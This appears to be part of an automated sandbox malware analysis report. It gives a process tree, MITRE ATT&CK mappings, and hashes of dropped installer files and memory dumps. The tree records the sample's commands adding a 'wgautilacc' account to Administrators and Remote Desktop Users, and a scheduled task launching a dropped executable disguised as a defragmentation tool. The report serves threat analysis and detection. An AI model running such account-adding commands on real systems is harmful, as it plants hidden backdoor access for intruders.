        System Location Discovery: System Language Discovery
        
        PID:1780
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net localgroup "Administrators" "wgautilacc" /add & net localgroup "Remote Desktop Users" "wgautilacc" /add
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    - System Location Discovery: System Language Discovery
    PID:2408
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Administrators" "wgautilacc" /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:1548
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" "wgautilacc" /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3016
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Remote Desktop Users" "wgautilacc" /add
      4⤵
      Remote Service Session Hijacking: RDP Hijacking
      System Location Discovery: System Language Discovery
      PID:2880
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" "wgautilacc" /add
        5⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:2512

C:\Windows\system32\taskeng.exe
taskeng.exe {EE836CE3-5772-4B54-9F6B-FAA8593730C5} S-1-5-21-2212144002-1172735686-1556890956-1000:MVFYZPLM\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:3636
- C:\Program Files\Defragmentation\abashed.exe
  "C:\Program Files\Defragmentation\abashed.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RDP_5166.exe

Filesize
569KB

MD5
a46ab91afbba2a657bce8e961bf2632f

SHA1
7c1a484a381fc4915c6904358f7a3611ad9323d2

SHA256
740b1c1498915271214824fa1c5f1a373efdcf13adee853f70d582cec353a1a1

SHA512
a1a519c05dea2ab7db4dcea2945c6afb5292d1701404b0de7c530df13ffe81db986fd9c7d703225178f9df4468c17c9db0a78029ae87112e35c51490576a17c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\SETUP_73538.exe

Filesize
1.5MB

MD5
9adce164113ec09d243a78029aecfa2e

SHA1
403fb3148345800ca6f0374459e3f6d5ef3b613e

SHA256
d577804cf39a7af100747f2dcc00c525a19fa3cb0498885d020cc2a0f10a9436

SHA512
c938ccc8b89181e2d5113f31e4adc532b0c62793ba3549dbc7ece22a30219d4f0885e89b1ac01499bed5ea1dd653cbee3b61bdb0883d9980ea4c518ac70b01f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz4AF6.tmp\nsExec.dll

Filesize
7KB

MD5
f27689c513e7d12c7c974d5f8ef710d6

SHA1
e305f2a2898d765a64c82c449dfb528665b4a892

SHA256
1f18f4126124b0551f3dbcd0fec7f34026f930ca509f04435657cedc32ae8c47

SHA512
734e9f3989ee47a86bee16838df7a09353c7fe085a09d77e70d281b21c5477b0b061616e72e8ac8fcb3dda1df0d5152f54dcc4c5a77f90fbf0f857557bf02fbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz8BDC.tmp\System.dll

Filesize
11KB

MD5
0063d48afe5a0cdc02833145667b6641

SHA1
e7eb614805d183ecb1127c62decb1a6be1b4f7a8

SHA256
ac9dfe3b35ea4b8932536ed7406c29a432976b685cc5322f94ef93df920fede7

SHA512
71cbbcaeb345e09306e368717ea0503fe8df485be2e95200febc61bcd8ba74fb4211cd263c232f148c0123f6c6f2e3fd4ea20bdecc4070f5208c35c6920240f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz8BDC.tmp\nsExec.dll

Filesize
6KB

MD5
293165db1e46070410b4209519e67494

SHA1
777b96a4f74b6c34d43a4e7c7e656757d1c97f01

SHA256
49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

SHA512
97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

Download Submit
\Program Files\Defragmentation\abashed.exe

Filesize
12.3MB

MD5
ceead38e6521ea6bcf26c3cf266baec7

SHA1
d7523a46243b459deb53663e5bfa5a85cb760ff0

SHA256
8c62370f1ff4d32794b8b554ae75a3c3b457561542ed9795c1819bbb6746599b

SHA512
0691bcf9b29fb996ab02c8a184900d8b10c1475519dbc66d331dd2ea0fcd6a82957e129b7edc440a23145f24cf4fa0eb433388477939e58f7186527febccf0ab

Download Submit
\Users\Admin\AppData\Local\Temp\nsz4AF6.tmp\NSISList.dll

Filesize
105KB

MD5
4b0617493f32b2b5fe5e838eeb885819

SHA1
336e84380420a9caaa9c12af7c8e530135e63c57

SHA256
df3621f83e9d11be45e0e617b899c4ab0241f60ed56494e892dc449482058402

SHA512
5c50cf97cd9a6c699ec7928a08f77f4eaa68105e87a974432e39b637f926f0df8a95ec19bd63465fc438a4ef6349398938bc8d7651de125d13ccab89d1d49143

Download Submit
\Users\Admin\AppData\Local\Temp\nsz4AF6.tmp\System.dll

Filesize
12KB

MD5
8cf2ac271d7679b1d68eefc1ae0c5618

SHA1
7cc1caaa747ee16dc894a600a4256f64fa65a9b8

SHA256
6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba

SHA512
ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

Download Submit
\Users\Admin\AppData\Local\Temp\nsz4AF6.tmp\nsProcess.dll

Filesize
4KB

MD5
f0438a894f3a7e01a4aae8d1b5dd0289

SHA1
b058e3fcfb7b550041da16bf10d8837024c38bf6

SHA256
30c6c3dd3cc7fcea6e6081ce821adc7b2888542dae30bf00e881c0a105eb4d11

SHA512
f91fcea19cbddf8086affcb63fe599dc2b36351fc81ac144f58a80a524043ddeaa3943f36c86ebae45dd82e8faf622ea7b7c9b776e74c54b93df2963cfe66cc7

Download Submit
\Users\Admin\AppData\Local\Temp\nsz4AF6.tmp\registry.dll

Filesize
24KB

MD5
2b7007ed0262ca02ef69d8990815cbeb

SHA1
2eabe4f755213666dbbbde024a5235ddde02b47f

SHA256
0b25b20f26de5d5bd795f934c70447112b4981343fcb2dfab3374a4018d28c2d

SHA512
aa75ee59ca0b8530eb7298b74e5f334ae9d14129f603b285a3170b82103cfdcc175af8185317e6207142517769e69a24b34fcdf0f58ed50a4960cbe8c22a0aca

Download Submit
memory/2240-19-0x0000000002B70000-0x0000000002B94000-memory.dmp

Filesize
144KB

Download
memory/2240-25-0x0000000002CE0000-0x0000000002D39000-memory.dmp

Filesize
356KB

Download
memory/2704-6149-0x0000000000400000-0x00000000010EC000-memory.dmp

Filesize
12.9MB

Download
memory/2704-6092-0x0000000000400000-0x00000000010EC000-memory.dmp

Filesize
12.9MB

Download
memory/2704-6147-0x0000000000400000-0x00000000010EC000-memory.dmp

Filesize
12.9MB

Download
memory/2704-6154-0x0000000000400000-0x00000000010EC000-memory.dmp

Filesize
12.9MB

Download
memory/2704-6156-0x0000000000400000-0x00000000010EC000-memory.dmp

Filesize
12.9MB

Download
memory/2704-6157-0x0000000000400000-0x00000000010EC000-memory.dmp

Filesize
12.9MB

Download
memory/2704-6159-0x0000000000400000-0x00000000010EC000-memory.dmp

Filesize
12.9MB

Download
memory/2704-6160-0x0000000000400000-0x00000000010EC000-memory.dmp

Filesize
12.9MB

Download
memory/3060-841-0x0000000000400000-0x00000000010EC000-memory.dmp

Filesize
12.9MB

Download
memory/3060-266-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/3756-6127-0x0000000000400000-0x00000000010EC000-memory.dmp

Filesize
12.9MB

Download
memory/3812-6146-0x0000000000400000-0x000000000058F000-memory.dmp

Filesize
1.6MB

Download